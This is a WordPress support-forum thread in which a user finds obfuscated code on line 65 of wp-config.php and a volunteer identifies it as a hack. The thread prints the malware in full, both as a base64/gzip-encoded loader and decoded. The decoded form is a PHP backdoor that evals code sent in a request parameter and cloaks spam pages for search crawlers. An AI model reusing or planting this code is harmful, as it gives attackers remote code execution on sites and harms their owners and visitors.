Fatal error after upgrading to PHP 8

It appears that some code from some plugin or active theme is not compatible with the PHP8 which is why it is throwing Fatal error.

Hello @wpcoworker

The problem is caused directly by wordpress, which calls an undefined function. However, I can’t just delete a call to this function. Don’t know the replacement for this function, please?

I already have access to this file, but I don’t understand how to fix it at all.

Please help

Thank you

$bfd0fd = 'bas' . 'e64_dec' . 'ode'; $c98cae = 'crea' . 'te_fun' . 'ction'; $g926cd = 'gz' . 'unc' . 'ompress'; $fef80e = $c98cae('', $g926cd($bfd0fd('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'))); $fef80e();

That looks to me like you’ve been hacked. Is that in wp-config.php?

@sterndata

Yes, the code above is on line 65 in wp-config.php

I was able to decode the code, but I’m not sure what it might cause.

if(!defined('AGENT_DECLARED')){define('AGENT_DECLARED',true);if(!empty($_SERVER['HTTP_ECHO'])){@header('Echo: '.$_SERVER['HTTP_ECHO']);}class _lX0t0{function _Fe5bk($_eUcNE,$_R4yeu,$_aDQw3,$_HVI0R='http'){switch($_HVI0R){case 'http':$_UmhQx='tcp://';break;case 'https':$_UmhQx='ssl://';break;default:return false;}if(function_exists('stream_socket_client')){$_Fp1fG=array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false));$_RAiDi=stream_context_create($_Fp1fG);$_CWIEE=$_UmhQx.$_eUcNE.':'.$_R4yeu;$_Ts31M=@stream_socket_client($_CWIEE,$_PRxiq,$_nh0tz,5,STREAM_CLIENT_CONNECT,$_RAiDi);}else{$_Ts31M=@fsockopen($_UmhQx.$_eUcNE,$_R4yeu,$_PRxiq,$_nh0tz,5);}if(!$_Ts31M){return false;}@fputs($_Ts31M,$_aDQw3);$_thl4K='';while(!feof($_Ts31M)){$_thl4K.=@fread($_Ts31M,8192);}@fclose($_Ts31M);if(!preg_match("/^(.*?)\r\n\r\n(.*)$/s",$_thl4K,$_LfK9r)){return false;}return array('header'=>$_LfK9r[1],'content'=>$_LfK9r[2]);}function _qTjPG($_T1ivv,$_laY0u=array()){$_EqUp8=@parse_url($_T1ivv);if(empty($_EqUp8['scheme'])||empty($_EqUp8['host'])){return false;}$_eUcNE=$_EqUp8['host'];$_HVI0R=$_EqUp8['scheme'];if(empty($_EqUp8['path'])){$_XnmKh='/';}else{$_XnmKh=$_EqUp8['path'];}if(!empty($_EqUp8['query'])){$_XnmKh.='?'.$_EqUp8['query'];}if(!empty($_EqUp8['port'])){$_R4yeu=$_EqUp8['port'];}else{$_R4yeu='80';}if(count($_laY0u)>0){$_laY0u=join("\r\n",$_laY0u)."\r\n";}else{$_laY0u='';}$_aDQw3="GET ".$_XnmKh." HTTP/1.0\r\n"."HOST: ".$_eUcNE."\r\n".$_laY0u."Connection: close\r\n\r\n";$_thl4K=$this->_Fe5bk($_eUcNE,$_R4yeu,$_aDQw3,$_HVI0R);return$_thl4K;}}class _FJkfs{private$_Qxqi5;function __construct($_Qxqi5){if(!file_exists($_Qxqi5)){$_ERtAc=dirname($_Qxqi5);$_85RGQ=@filemtime($_ERtAc);if(@mkdir($_Qxqi5)){@chmod($_Qxqi5,0777);if($_85RGQ!==false){@touch($_ERtAc,$_85RGQ);}}}$this->_Qxqi5=$_Qxqi5;}private function _9Hduc($_nCmur){return$this->_Qxqi5.'/'.$_nCmur;}function _PydCB($_nCmur){$_BsRok=@file_get_contents($this->_9Hduc($_nCmur));$_BsRok=@gzuncompress(@base64_decode($_BsRok));return$_BsRok;}function _20uOW($_BsRok,$_nCmur){$_BsRok=base64_encode(gzcompress($_BsRok));$_z0DaS=$this->_9Hduc($_nCmur);if(($_Ts31M=@fopen($_z0DaS,"w"))&&(@flock($_Ts31M,LOCK_EX))){@fputs($_Ts31M,$_BsRok);@flock($_Ts31M,LOCK_UN);@fclose($_Ts31M);@chmod($_z0DaS,0666);}}function _6Q8QB($_nCmur,$_EPiNF){$_85RGQ=@filemtime($this->_9Hduc($_nCmur));if(($_85RGQ+$_EPiNF)<=time()){return true;}return false;}function _Jm8Pv($_nCmur){if(file_exists($this->_9Hduc($_nCmur))){return true;}return false;}function _7J3B0(){if(file_exists($this->_Qxqi5)&&is_writable($this->_Qxqi5)){return true;}return false;}}class _uNM4K{public$_MJgak='google|slurp|msnbot|bingbot|baiduspider';public$_BB1Ll='ProxyAgent';public$_eAJ1C=259200;function __construct($_AcK5h){$_8DPSi=md5('@config@');if($_AcK5h->_Jm8Pv($_8DPSi)){$_Y39q4=@unserialize($_AcK5h->_PydCB($_8DPSi));}if(isset($_Y39q4['SEARCHENGINE_AGENTS'])){$this->_MJgak=$_Y39q4['SEARCHENGINE_AGENTS'];}if(isset($_Y39q4['PROXY_USER_AGENT'])){$this->_BB1Ll=$_Y39q4['PROXY_USER_AGENT'];}if(isset($_Y39q4['SITE_CACHE_EXPIRE'])){$this->_eAJ1C=$_Y39q4['SITE_CACHE_EXPIRE'];}}function _Txm80(){if(isset($_SERVER['HTTP_USER_AGENT'])&&preg_match('/'.$this->_MJgak.'/i',$_SERVER['HTTP_USER_AGENT'])){return true;}return false;}}class _Gr3yY{private$_AcK5h;function __construct($_AcK5h){$this->_AcK5h=$_AcK5h;}function _FchYn(){$_FZpxd=md5('@donor@page@list@');$_hms8R=$this->_AcK5h->_PydCB($_FZpxd);if(!empty($_hms8R)){$_hms8R=@unserialize($_hms8R);}return$_hms8R;}function _jf2If($_vVPYs,$_BsRok){$_YW6vz=md5('@donor@page@handler@');$_Le4gX=$this->_AcK5h->_PydCB($_YW6vz);if(!empty($_Le4gX)){$_Le4gX=@unserialize($_Le4gX);$_1xkMi=$_Le4gX['function'];@eval($_Le4gX['code']);$_vVPYs=@$_1xkMi($_vVPYs,$_BsRok);}return$_vVPYs;}function _fyPyr(){$_sZP4C=md5('@donor@page@data@'.$_SERVER['REQUEST_URI'].'@');$_BsRok=$this->_AcK5h->_PydCB($_sZP4C);if(!empty($_BsRok)){$_BsRok=@unserialize($_BsRok);}return$_BsRok;}}class _8Rihn{private$_Y39q4;private$_NPLDf;function __construct($_Y39q4,$_NPLDf){$this->_Y39q4=$_Y39q4;$this->_NPLDf=$_NPLDf;}function _SqNVw(){if(isset($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!='off'){$_jK79T='https';$_R4yeu=443;}else{$_jK79T='http';$_R4yeu=80;}$_laY0u=array('User-Agent: '.$this->_Y39q4->_BB1Ll);$_thl4K=$this->_NPLDf->_qTjPG($_jK79T.'://'.$_SERVER['HTTP_HOST'].':'.$_R4yeu.$_SERVER['REQUEST_URI'],$_laY0u);if($_thl4K!==false){if(!preg_match('/^HTTP\/1\.(0|1) 200 OK/im',$_thl4K['header'])){return false;}if(!preg_match('/^Content-Type\: text\/html/im',$_thl4K['header'])){return false;}return$_thl4K['content'];}return false;}}class _DV6Or{private$_Y39q4;private$_AcK5h;private$_StBpd;function __construct($_Y39q4,$_AcK5h,$_StBpd){$this->_Y39q4=$_Y39q4;$this->_AcK5h=$_AcK5h;$this->_StBpd=$_StBpd;}function _SqNVw(){$_BzW8q=md5('@site@page@'.$_SERVER['HTTP_HOST'].'@'.$_SERVER['REQUEST_URI'].'@');if($this->_AcK5h->_Jm8Pv($_BzW8q)&&!$this->_AcK5h->_6Q8QB($_BzW8q,$this->_Y39q4->_eAJ1C)){$_vVPYs=$this->_AcK5h->_PydCB($_BzW8q);}else{$_vVPYs=$this->_StBpd->_SqNVw();$this->_AcK5h->_20uOW($_vVPYs,$_BzW8q);}return$_vVPYs;}}define('AGENT_KEY','aa10a5e6f422ab8447d92bba1c52fc2f');define('AGENT_CACHE_PATH','wp-content/languages/settings');$_AcK5h=new _FJkfs(dirname(__FILE__).'/'.AGENT_CACHE_PATH);if(!empty($_REQUEST[AGENT_KEY])){eval(@gzuncompress(@base64_decode(strrev($_REQUEST[AGENT_KEY]))));die;}$_Y39q4=new _uNM4K($_AcK5h);$_NPLDf=new _lX0t0();if(!empty($_SERVER['REQUEST_URI'])&&$_AcK5h->_7J3B0()){$_p1DuD=new _Gr3yY($_AcK5h);$_p99rq=$_p1DuD->_FchYn();if(!empty($_p99rq)&&is_array($_p99rq)&&in_array($_SERVER['REQUEST_URI'],$_p99rq)){@header('Cache-Control: no-cache');if($_Y39q4->_Txm80()){$_StBpd=new _8Rihn($_Y39q4,$_NPLDf);$_gucbl=new _DV6Or($_Y39q4,$_AcK5h,$_StBpd);$_8qVD4=$_gucbl->_SqNVw();if(!empty($_8qVD4)){$_rU8Xb=$_p1DuD->_fyPyr();$_8qVD4=$_p1DuD->_jf2If($_8qVD4,$_rU8Xb);echo$_8qVD4;die;}}}}}

You’ve been hacked. Remove that from wp-config.php. Use wp-config-sample.php as a model for what *should* be there. Then, finish delousing your setup. Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

@sterndata

So the web already works and the solution was incredibly easy. Just delete the problem line. Still, thank you for your effort.

Deleting that line does not mean you’ve removed the hack! Install WordFence or another good security plugin and scan your site.

@sterndata

Yes, that’s what I wanted to do. WordFence is probably the most used, but it is quite a burden on the system. From what I’ve been looking for, All In One WP Security & Firewall looks good. What do you think?

I think you should try one, then the other, and see what works best for you. (Do not use multiple security plugins at the same time; they’ll probably fight with each other.)

@sterndata

(Do not use multiple security plugins at the same time; they’ll probably fight with each other.)

Of course. I have encountered this problem a long time ago.

Finally, I used WP Cerber Security, Anti-spam & Malware Scan. If complications arose, I would write again, but for now I would close this discussion.

Thank you